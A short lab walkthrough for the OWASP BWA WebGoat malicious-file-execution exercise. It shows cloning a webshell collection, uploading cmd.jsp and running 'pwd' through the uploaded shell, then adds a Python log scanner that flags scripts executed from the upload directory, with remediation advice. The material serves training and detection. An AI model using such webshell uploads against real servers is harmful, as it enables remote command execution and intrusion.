OwaspBWA - Malicious File Execution

Malicious File Execution

In this exercise we try uploading a .jsp shell in order to execute commands.

  • Install fuzzdb on Ubuntu (and clone the webshell collection):
    svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
    git clone https://github.com/tennc/webshell

  • Upload > cmd.jsp
    (from: /home/{user}/fuzzdb-read-only/web-backdoors/jsp/cmd.jsp)

  • Execute command: /WebGoat/uploads/cmd.jsp?cmd=pwd


Output :
Command: pwd
 /var/lib/tomcat6
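As an added example (not part of the original walkthrough), here is the defender-side check for this lesson: scan Tomcat access-log lines for requests that execute a server-side script from the upload directory, which is exactly what the /WebGoat/uploads/cmd.jsp?cmd=pwd request above looks like. The log lines are constructed, and the upload prefix and "common" log format are assumptions.

```python
import re
from posixpath import splitext
from urllib.parse import urlsplit, parse_qs

# Server-side script extensions that Tomcat will compile and run if reachable by URL.
SCRIPT_EXTENSIONS = {".jsp", ".jspx", ".jspf", ".jsw", ".jsv"}
# Assumed: the upload directory used in the walkthrough (adjust for your deployment).
UPLOAD_PREFIXES = ("/WebGoat/uploads/",)

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def script_under_uploads(target):
    """True when the request path is a server-side script inside an upload directory."""
    path = urlsplit(target).path
    if not path.startswith(UPLOAD_PREFIXES):
        return False
    return splitext(path)[1].lower() in SCRIPT_EXTENSIONS  # case-insensitive: cmd.JSP too

def scan(lines):
    """Flag every request that runs a script from the upload directory, with its arguments."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not script_under_uploads(rec["target"]):
            continue
        parts = urlsplit(rec["target"])
        findings.append({
            "ip": rec["ip"],
            "path": parts.path,
            "params": parse_qs(parts.query),  # e.g. {"cmd": ["pwd"]}
            "status": int(rec["status"]),     # 2xx means the script actually ran
        })
    return findings

# Constructed sample log, modelled on the request shown in the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2014:10:01:02 +0700] "GET /WebGoat/attack HTTP/1.1" 200 5120
10.0.0.5 - - [12/Mar/2014:10:01:40 +0700] "POST /WebGoat/attack HTTP/1.1" 200 5388
10.0.0.5 - - [12/Mar/2014:10:02:03 +0700] "GET /WebGoat/uploads/cmd.jsp?cmd=pwd HTTP/1.1" 200 312
10.0.0.5 - - [12/Mar/2014:10:02:15 +0700] "GET /WebGoat/uploads/photo.png HTTP/1.1" 200 88213
10.0.0.9 - - [12/Mar/2014:10:03:00 +0700] "GET /WebGoat/uploads/shell.JSPX HTTP/1.1" 404 -
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The real fix is to keep uploaded files outside the servlet context (or serve them only through a handler that never compiles them) and to allow-list extensions on upload; the scan above tells you whether that control has already failed.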